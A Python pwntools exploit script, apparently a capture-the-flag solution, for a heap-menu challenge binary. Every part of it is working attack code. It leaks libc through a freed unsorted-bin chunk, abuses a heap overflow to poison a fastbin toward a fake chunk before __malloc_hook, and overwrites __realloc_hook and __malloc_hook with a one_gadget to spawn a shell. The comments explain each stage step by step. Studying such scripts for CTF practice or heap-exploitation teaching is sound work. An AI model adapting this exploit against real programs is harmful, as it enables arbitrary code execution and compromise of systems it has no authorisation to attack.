from
pwn
import
*
# Target is a 64-bit Linux binary. 'debug' makes pwntools echo every byte sent
# to / received from the process, which helps while the heap layout is being
# worked out but is very noisy once the exploit is stable.
context.update(arch='amd64', os='linux', log_level='debug')

# Local instance of the challenge binary.
p = process('./pwn')

# Symbol tables: libc supplies the __malloc_hook / realloc offsets used later;
# the binary's own ELF is loaded but not referenced by the visible exploit code.
libc = ELF('./libc.so.6')
elf = ELF('./pwn')
def add(idx, size, content):
    """Menu option 1: allocate slot ``idx`` of ``size`` bytes and fill it with ``content``.

    ``content`` is delivered with ``sendafter`` (no trailing newline), so exactly
    those bytes reach the target.  The exploit later passes a payload longer
    than ``size`` through this function, i.e. the target's read is not bounded by
    the requested size -- that heap overflow is the bug being exploited.
    """
    replies = (
        (b'choice?\n', b'1'),
        (b'one?\n', f'{idx}'.encode()),
        (b'need?\n', f'{size}'.encode()),
    )
    for prompt, answer in replies:
        p.sendlineafter(prompt, answer)
    p.sendafter(b'data\n', content)
def edit(idx, size, content):
    """Menu option 2: rewrite slot ``idx`` with ``size`` bytes taken from ``content``.

    Same prompt sequence as ``add`` apart from the menu choice; ``content`` is
    sent raw (``sendafter``), so no newline is appended.  Not used by the visible
    exploit sequence, kept for completeness of the menu wrapper.
    """
    replies = (
        (b'choice?\n', b'2'),
        (b'one?\n', f'{idx}'.encode()),
        (b'need?\n', f'{size}'.encode()),
    )
    for prompt, answer in replies:
        p.sendlineafter(prompt, answer)
    p.sendafter(b'data\n', content)
def delete(idx):
    """Menu option 3: free slot ``idx``.

    The exploit frees the same slot index again after re-allocating it, so the
    target evidently does not prevent reuse of a freed index.
    """
    replies = (
        (b'choice?\n', b'3'),
        (b'one?\n', f'{idx}'.encode()),
    )
    for prompt, answer in replies:
        p.sendlineafter(prompt, answer)
def show(idx):
    """Menu option 4: ask the target to print slot ``idx``.

    Only drives the menu; whatever the target echoes is left in the process
    buffer for the caller to ``recv``.
    """
    replies = (
        (b'choice?\n', b'4'),
        (b'one?\n', f'{idx}'.encode()),
    )
    for prompt, answer in replies:
        p.sendlineafter(prompt, answer)
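# ---- Stage 1: libc leak through a freed unsorted-bin chunk -----------------
# malloc(0x79) rounds up to a 0x90 chunk, which is above the fastbin range, so
# freeing it puts it in the unsorted bin with main_arena pointers in fd/bk.
# Chunk 1 sits between chunk 0 and the top chunk so the free does not merge
# chunk 0 into top.
add(0, 0x79, b'a' * 0x78)
add(1, 0x18, b'b' * 0x18)
delete(0)
# Re-taking the same chunk with a one-byte write leaves the stale fd pointer
# in place except for its lowest byte, which is now 0x61 ('a').
add(0, 0x79, b'a')
show(0)

# Note: recvuntil(b'\x7f') blocks indefinitely if the leaked pointer's top byte
# is not 0x7f (e.g. an unusual ASLR base); rerun in that case.
leak = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

# Distance from the leaked, low-byte-clobbered pointer to the libc base for the
# bundled ./libc.so.6.  Presumably this is main_arena's unsorted-bin pointer
# offset with its low byte replaced by 'a' -- re-derive it whenever the libc
# build changes; nothing below is meaningful with the wrong value.
UNSORTED_LEAK_OFFSET = 0x3c4b61
libc_base = leak - UNSORTED_LEAK_OFFSET

# A libc mapping is page aligned.  A misaligned result means the leak was
# parsed wrongly or the offset is for a different build; stop here rather than
# go on to write a hook at a garbage address.
if libc_base & 0xfff:
    raise RuntimeError(f'implausible libc base {libc_base:#x}; check the leak and UNSORTED_LEAK_OFFSET')
print('libc_base = ' + hex(libc_base))

# ---- Stage 2: fastbin dup into a fake chunk in front of __malloc_hook -------
# 0x68 rounds up to a 0x70 chunk, which is fastbin-sized.  Free chunk 2 first,
# then chunk 1 (the 0x20 chunk directly before chunk 2 on the heap).
add(2, 0x68, b'c' * 0x68)
delete(2)
delete(1)

# Fake chunk header placed 0x23 bytes before __malloc_hook.  Presumably the
# bytes found there read as a size of 0x7f, which satisfies the fastbin size
# check for the 0x70 bin -- confirm against the bundled libc if this fails.
target = libc_base + libc.sym['__malloc_hook'] - 0x23

# Re-taking chunk 1 with 0x28 bytes (more than the 0x18 requested) overflows
# into chunk 2's header: keep its size word at 0x71 and point its fastbin fd
# at the fake chunk.  This relies on add() not bounding the write by size.
add(1, 0x18, b'b' * 0x18 + p64(0x71) + p64(target))
# The first 0x70 allocation hands back chunk 2 itself; the fake chunk is now
# at the head of the 0x70 fastbin.
add(2, 0x68, b'c' * 0x68)

# ---- Stage 3: overwrite __realloc_hook / __malloc_hook and trigger ----------
realloc = libc_base + libc.sym['realloc']
# one_gadget candidates for the bundled libc; these offsets are specific to
# that build and must be regenerated for any other libc.
one_gadget = [0x4527a, 0xf03a4, 0xf1247]

# User data of the fake chunk starts at __malloc_hook - 0x13.  Eleven bytes of
# padding put the first qword on __realloc_hook (__malloc_hook - 8) and the
# second on __malloc_hook itself.  Chain: malloc -> __malloc_hook -> realloc+8
# -> __realloc_hook -> one_gadget.  Entering realloc a few bytes in
# presumably adjusts the stack so the gadget's register/stack constraints
# hold; try the other one_gadget entries or a different realloc offset if the
# shell does not spawn.
add(4, 0x68, b'p' * 11 + p64(libc_base + one_gadget[0]) + p64(realloc + 8))

# Trigger another malloc by hand rather than through add(): once the hook
# fires the target never reaches its 'data' prompt, and add()'s sendafter
# would block waiting for it.
p.sendlineafter(b'choice?\n', b'1')
p.sendlineafter(b'one?\n', b'0')
p.sendlineafter(b'need?\n', b'100')
p.interactive()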